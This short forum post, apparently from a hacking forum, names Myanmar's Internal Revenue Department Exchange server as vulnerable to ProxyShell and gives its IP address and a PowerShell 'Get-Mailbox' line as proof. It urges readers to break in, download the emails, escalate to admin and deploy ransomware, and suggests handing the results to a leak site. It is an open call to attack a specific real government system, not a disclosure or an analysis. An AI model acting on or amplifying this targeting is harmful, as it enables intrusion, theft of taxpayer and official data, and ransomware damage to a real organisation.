#1
(This post was last modified: 08 April, 2022 - 07:32 PM by SherlockHemredge. Edited 2 times in total.)
Myanmar Internal Revenue Department! ird.gov.mm has been found to be vulnerable to ProxyShell. With this you can gain remote access to their Exchange server. From here it's up to you. Download their emails, elevate to admin and fire off some RAAS, it's up to you. Maybe you're against the current military coup?

Once you pwn them you can shout out to Emma Best on Twitter and see your hard work published on ddosecrets.com.

It's important to note that a lot of RAAS groups have been exploiting ProxyShell.

POC: 136.228.161.122 (ird.gov.mm)
PS> Get-Mailbox (https://archive.ph/eOmiT)

https://ird.gov.mm/

Happy Hacking kek